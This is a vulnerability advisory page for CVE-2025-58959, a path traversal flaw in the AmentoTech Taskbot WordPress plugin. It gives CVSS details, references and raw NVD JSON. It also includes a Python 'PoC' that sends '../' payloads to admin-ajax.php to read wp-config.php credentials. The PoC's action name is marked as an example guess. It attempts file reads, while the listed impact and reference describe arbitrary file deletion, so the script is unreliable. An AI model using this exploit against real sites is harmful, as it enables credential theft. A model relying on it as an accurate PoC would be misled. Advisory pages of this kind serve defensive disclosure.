CVE-2025-58959

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Taskbot taskbot allows Path Traversal.This issue affects Taskbot: from n/a through <= 6.4.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AmentoTech Taskbot <= 6.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58959 Path Traversal PoC
# Target: AmentoTech Taskbot WordPress Plugin <= 6.4
# Vulnerability: Path Traversal in file handling

import requests
import sys

TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php"
COOKIES = {"wordpress_test_cookie": "WP+Cookie+check"}

def exploit_path_traversal(target, target_file):
    """Exploit path traversal to read arbitrary files"""
    
    # Path traversal payload to read sensitive files
    payload = f"../../../{target_file}"
    
    # Common vulnerable parameters in Taskbot plugin
    params = {
        "action": "taskbot_file_include",  # Example action parameter
        "file": payload
    }
    
    print(f"[*] Attempting to read: {target_file}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.get(
            target,
            params=params,
            cookies=COOKIES,
            timeout=10,
            verify=False
        )
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text[:500])
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    else:
        target_url = TARGET_URL
    
    # Target sensitive files
    target_files = [
        "wp-config.php",
        "../wp-config.php",
        "../../wp-config.php",
        "../../../wp-config.php"
    ]
    
    for target_file in target_files:
        exploit_path_traversal(target_url, target_file)
        print("-" * 50)

# Usage: python cve_2025_58959_poc.py http://target.com/wp-admin/admin-ajax.php

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58959
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58959
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58959/
[4] VulDB https://vuldb.com/cve/CVE-2025-58959
[5] https://patchstack.com/database/Wordpress/Plugin/taskbot/vulnerability/wordpress-taskbot-plugin-6-4-arbitrary-file-deletion-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58959", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:52.543", "lastModified": "2026-04-27T20:16:22.700", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Taskbot taskbot allows Path Traversal.This issue affects Taskbot: from n/a through <= 6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/taskbot/vulnerability/wordpress-taskbot-plugin-6-4-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}